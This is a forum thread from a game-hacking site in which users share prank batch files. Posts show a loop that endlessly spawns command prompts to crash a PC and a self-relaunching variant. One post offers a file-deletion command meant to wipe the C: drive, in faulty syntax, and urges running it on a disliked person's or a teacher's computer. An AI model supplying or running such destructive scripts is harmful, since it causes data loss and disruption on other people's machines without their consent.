Arcade Prehacks

Page 1 of 3 123 LastLast
Results 1 to 10 of 25
  1. #1
    DaBestMan's Avatar
    Join Date
    Feb 2010
    Location
    Somewhere In NY
    Posts
    450

    Cool And Annoying Program!

    I Made This For Fun Use It At Your Own Risk.
    Attached Files Attached Files

  2. #2
    Senior Member
    Join Date
    Jul 2009
    Posts
    8,079

    Re: Cool And Annoying Program!

    Easy to make.
    You just punch in some code lines in Notepad,save it as .bat and there you go.

  3. #3
    DaBestMan's Avatar
    Join Date
    Feb 2010
    Location
    Somewhere In NY
    Posts
    450

    Re: Cool And Annoying Program!

    But Its Still A Nasty Program.

  4. #4
    Senior Member
    Join Date
    Jul 2009
    Posts
    8,079

    Re: Cool And Annoying Program!

    But its soo simple to make.

    P.S.
    Why Do You Talk Like This?

  5. #5
    DaBestMan's Avatar
    Join Date
    Feb 2010
    Location
    Somewhere In NY
    Posts
    450

    Re: Cool And Annoying Program!

    I thought it would make me look cooler.

  6. #6
    Senior Member noahzhang's Avatar
    Join Date
    Jan 2009
    Posts
    691

    Re: Cool And Annoying Program!

    you crashed my computer. and no talking like that does not make you look cooler.

  7. #7
    Senior Member
    Join Date
    Jan 2010
    Location
    TRMI
    Posts
    4,616

    Re: Cool And Annoying Program!

    So this program crashes computers, i think i should remove it

  8. #8
    router's Avatar
    Join Date
    Dec 2009
    Posts
    223

    Re: Cool And Annoying Program!

    This is the program:

    Code:
    @echo off
    :A
    start cmd and paint
    goto :A
    This program goes into an infinite loop of starting command prompts.

    There is an error in this batch file. "start cmd and paint" won't start a new instance of the command prompt and paint. It'll only start a new instance of the command prompt with the arguments "and paint".
    In the process of [insert status here]
    May post from time to time.

  9. #9
    Senior Member
    Join Date
    Jul 2009
    Posts
    8,079

    Re: Cool And Annoying Program!

    Or a simpler version would be...
    Code:
    Start arcadetrainerdotcom.bat
    Close.
    Then save as a .bat.

  10. #10
    Senior Member dalvo's Avatar
    Join Date
    Sep 2008
    Posts
    408

    Re: Cool And Annoying Program!

    dude this thing was annoying i had to restart pc cause i didnt know how to stop it... its a good thing i have 4gb of ram or my pc would have froze along time ago, ok guys dont try this 1 but if u do... just dont! do it to someone u dont like or a teachers pc...

    Code:
    @Echo off
    Del C:\ *.* |y
    [color=#FF0000]THIS WILL WIPE UR HARD DRIVE SO DONT TEST IT... U HAVE TO MAKE IT IN NOTEPAD DON'T USE IT AT ALL ON UR PC, I AM NOT RESPONSIBLE IF U DESTROY UR PC WITH THIS...[/color]

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •